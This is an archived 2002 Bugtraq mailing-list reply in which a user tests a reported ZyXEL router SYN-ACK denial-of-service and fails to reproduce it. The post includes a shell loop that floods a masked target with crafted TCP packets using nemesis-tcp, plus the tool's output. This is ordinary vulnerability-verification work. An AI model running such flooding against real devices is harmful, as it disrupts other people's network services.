Re [BUGTRAQ] : ZyXEL 642R(-11) AJ.6 SYN-ACK, SYN-FIN DoS

From: Rich Henning (seclstsat_private)
Date: Mon Jun 17 2002 - 10:13:57 PDT

Next message: KF: "Clarification - IE gopher cross site scripting"

Previous message: alex medvedev: "m64config"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Sorry moderators, I accidently replied with this to bugtraq, but it
should probably have gone to vuln-dev.  my apologies.

On Mon, Jun 17, 2002 at 02:59:11PM +0200, Kistler Ueli wrote:
> ZyXEL Prestige 642R-11 AJ.6 has a problem handling special packets.
> It is possible to send a packet that will make unavailable
> the router's services (Telnet&FTP, DHCP service not tested).
> Network traffic isn't stopped.
> 
> Possibly more ZyNOS based routers are vulnerable. Please reply if you
> found any other ZyNOS based router vulnerable.

I was unable to reproduce this behavior on my Zyxel 643 ADSL router,
even under extremely heavy (continuous) SYN|ACK packet flooding to
several ports.  excerpt of one such test session follows, concluded with
ZyNOS information.

Immediately after single-packet, during continuous bombardment, and
afterwards, I was able to access the configuration menu via telnet.

The FTP and HTTP services are disabled on my router, and the only
firewall rule is to protect the SNMP Service of the Zyxel itself from
the WAN side, as I have a linux 2.4/netfilter box that protects the LAN
side of the internal network.

Thanks for the heads-up Kistler!

---
# while /bin/true; do nemesis-tcp -v -fS -fA -S xxx.xxx.xxx.xxx -D yyy.yyy.yyy.yyy -y 40023 -d eth0; done

 [ ...repeatedly... ]

TCP Packet Injection -=- The NEMESIS Project 1.32
Copyright (C) 1999, 2000, 2001 Mark Grimes <obecianat_private>
Portions copyright (C) 2001 Jeff Nathan <jeffat_private>

[IP]  xxx.xxx.xxx.xxx > yyy.yyy.yyy.yyy 
[MAC]  00:90:27:62:5A:D6 > 0D:0E:0A:0D:00:01
[Ports] 42069 > 40023
[Flags]  SYN ACK 
[TCP Urgent Pointer] 2048
[Window Size] 512
[ACK number] 420
[Sequence number] 420
[IP ID] 0
[IP TTL] 254
[IP TOS] 0x18
[IP Frag] 0x4000
[IP Options] 
Wrote 54 byte TCP packet through linktype 1

TCP Packet Injected

---

ZyNOS F/W Version: V2.50(AY.1) | 9/19/2001
ADSL Chipset Vendor: Alcatel, Version  3.6.70
Standard: G.DMT

-- 
[ rich henning      ]                                             /"\
[ henninrpat_private ]                                             \ /
                                                                   X
support the ascii ribbon campaign against html e-mail             / \

pgp: http://diss0nance.lawngnome.org/pgp_public.txt

Next message: KF: "Clarification - IE gopher cross site scripting"
Previous message: alex medvedev: "m64config"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Jun 17 2002 - 20:14:49 PDT